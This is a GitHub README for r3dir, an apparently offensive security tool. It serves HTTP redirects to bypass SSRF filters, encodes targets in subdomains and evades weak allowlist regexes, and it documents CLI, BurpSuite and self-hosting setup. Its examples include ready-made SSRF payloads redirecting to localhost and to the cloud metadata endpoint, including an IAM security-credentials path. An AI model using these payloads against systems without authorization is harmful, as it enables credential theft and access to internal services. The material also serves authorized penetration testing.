Repository files navigation

Redirection service designed to help bypass SSRF filters that do not validate the redirect location. It allows you to:

• Define the redirection target via URL parameters or subdomains;
• Control HTTP response status codes;
• Obfuscate the target URL with Base32 encoding;
• Bypass some allowlist filters;
• Support CORS preflight requests for headless browser redirects;
• Integrates with BurpSuite with help of Hackvertor tags.

Details about features of HTTP redirects in SSRF cases and how to utilize them viar3dir tool you can find inmy article.

The service is currently run at ther3dir.me domain and supports both HTTP and HTTPS.

r3dir provides two approaches to set redirection targets: parameter-based and domain-based.

Both approaches let you control HTTP status code of a response via first subdomain ofr3dir.me URL.

302.r3dir.me -> 302 Found307.r3dir.me -> 307 Temporary Redirect200.r3dir.me -> 200 OK

You connect to r3dir via HTTP(e.g.,http://307.r3dir.me), any HTTP code in200..599 range can be used. However, due some limitations of TLS certificates(see bellow), in case of HTTPS connection only3XX,200,404,500 are available.

To define the redirection target via a URL parameter, use/--to/?url=.... This method can be used when you can use full URL as SSRF payload without limitations.

#Redirects to http://localhost with `307 Temporary Redirect` status codehttps://307.r3dir.me/--to/?url=http://localhost

Basically, you can control only host part of URL to successfully perform SSRF via HTTP redirection. While existing tools require manual configuration of redirection targets in such case,r3dir provides an ability to dynamically set a target via subdomains.

As you can see, subdomains contain splited Base32-encoded compressed target which r3dir use to create redirect.

To create encoded domain, use CLI tool or embed it in BurpSuite as Hackvertor tag(see details below).

Maximum domain length is 253 characters. Unishox2 compression (around 30-40% for common SSRF payloads) compensates Base32 encoding. Thus r3dir provides 1-to-1 ratio for encoded targets on average and you can use r3dir with targets up to 230 characters (considering length of other parts of domain).

Due tolimitations of wildcard TLS cerficates which do not work with multipule wildcard domains(like*.*.301.r3dir.me) HTTPS domain-based redirection works with targets that are not longer that 63 symbols(maximum length of one subdomain) in encoded form. In addition,--ignore_part feature also is not available due to the limit.

#Redirects to http://169.254.169.254/latest/meta-data with `302 Found` status codehttps://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me

In addition, any subdomains before-- subdomain is ignored. The feature let bypass some weak filters which validates substring presence in a domain and works for both approaches.

#Ignores `some.domain.to.ignore` part and redirects to http://169.254.169.254/latest/meta-datahttp://some.domain.to.ignore.--.62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me#Ignores `some.domain.to.ignore` part and redirects to http://localhosthttp://some.domain.to.ignore.--.307.r3dir.me/--to/?url=http://localhost

To notify that target URL is too long to encode, CLI tool raisesTooLongTarget exception. For fuzzing in BurpSuite with Hackvertor tag or other automations, r3dir encoder has"Slient Mode". Slient mode preventsTooLongTarget error and produce an "error domain" for decoder with SHA-1 hash of the long target.

#Example of TooLongTarget error for HTTPS enforced encoding in Slient Mode$ r3dir encode http://169.254.169.254/latest/meta-data/iam/security-credentials/some_role -s --slient_modetoo-long-target-2b57569cfddb7d6f61331e123da605c7573521c9.302.r3dir.me#error-domain with SHA1 hash

r3dir decoder will parse such "error domain" and will respond with414 URI Too Long status code and message likeThe target length has been too long for encoder. Target's SHA-1: 2b57569cfddb7d6f61331e123da605c7573521c9.

Also, there isPyPi package which can be used as library for your own Python scripts and tools. Details and examples how to use you can find on PyPi page.

pipx install r3dir

$ r3dir encode -h  usage: r3dir encode [-h] [-c STATUS_CODE] [-i IGNORE_PART|-s] [--slient_mode] target_url  positional arguments:    target_url            Target URL which r3dir tool should redirect to  options:    -h, --help            show thishelp message andexit    -c STATUS_CODE, --status_code STATUS_CODE                          HTTP status code of a redirect response (default: 302)    -i IGNORE_PART, --ignore_part IGNORE_PART                          String, which will be ignored during decoding. Used to bypass weak REGEXs    -s, --https           HTTPS enforced encoding(TLS certificate length limitation)    --slient_mode         Slient modefor automations (e.g Hackvertor tags)

$ r3dir decode -h  usage: r3dir decode [-h] encoded_domain  positional arguments:    encoded_domain  r3dir encoded domain to decode  options:    -h, --help      show thishelp message andexit

To use CLI tool with own server, set your domain with-d option:

$ r3dir -husage: r3dir [-h] [-d MAIN_DOMAIN] {encode,decode,hackvertor} ...Encoded/decoder CLI toolfor r3dir serviceoptions:  -h, --help            show thishelp message andexit  -d MAIN_DOMAIN, --main_domain MAIN_DOMAIN                        Domain where r3dir tool is hosted on (default: r3dir.me)# Example of --main_domain option$ r3dir -d your.host encode http://localhost

For seamless web application fuzzing, r3dir has a custom Hackvertor tag for BurpSuite. If you haven't seen Hackvertor extension in BurpSuite before,check it.

To install r3dir Hackvertor tag in BurpSuite, follow next steps:

1. Install CLI tool

pip3 install r3dir

2. Runr3dir hackvertor to copy Hackvertor tags into clipboard:

• If you have set up own server, use-d option to set a custommain_domain for Hackvertor tags.

r3dir -d your.host hackvertor

• If CLI tool does not copy tags in your clipboard, you can use--print opiton to output into terminal and copy it manually

r3dir hackvertor --print

3. Add the tag to Hackvertor extension:

• Open Hackvertor menu in BurpSuite sidebar and ensure thatAllow code execution tags is enabled. Go toList custom tags.

• Then pressLoad tags from clipboard.

If you have your own custom tags, export them viaExport all my tags to clipboard, add r3dir tags to the exported JSON document and then reimport them.

To spin up own instance, follow next steps:

1. Download the repository

git clone https://github.com/Horlad/r3dir.gitcd r3dir

Out-of-box setup with Let's Encrypt wildcard TLS certificates autorenewal (for HTTPS support) requires the service to be hosted on DigitalOcean droplet withadded domain.

2. Fill environment file (.env) with your registered domain (APP_DOMAIN), DigitalOcean API token withread andwrite scopes (DO_AUTH_TOKEN) and email for Let's Encrypt (LETSENCRYPT_EMAIL)

echo$'APP_DOMAIN=YOUR_DOMAIN\nDO_AUTH_TOKEN=DO_TOKEN\nLETSENCRYPT_EMAIL=YOUR@EMAIL.COM'> .env

3. Docker Compose startup (Traefik + HTTP server)

docker compose up -d

You can custom Traefik configuration for different environments. Any configuration contributions for other platforms are highly appreciated.

In addition, if you want to use another HTTPS reverse proxy solution, you can run standalone Docker container with the HTTP service on 80 port.

3. Standalone Docker container startup(HTTP server only)

docker build. -t r3dirdocker run -p 80:80 -e MAIN_DOMAIN=127.0.0.1.traefik.me r3dir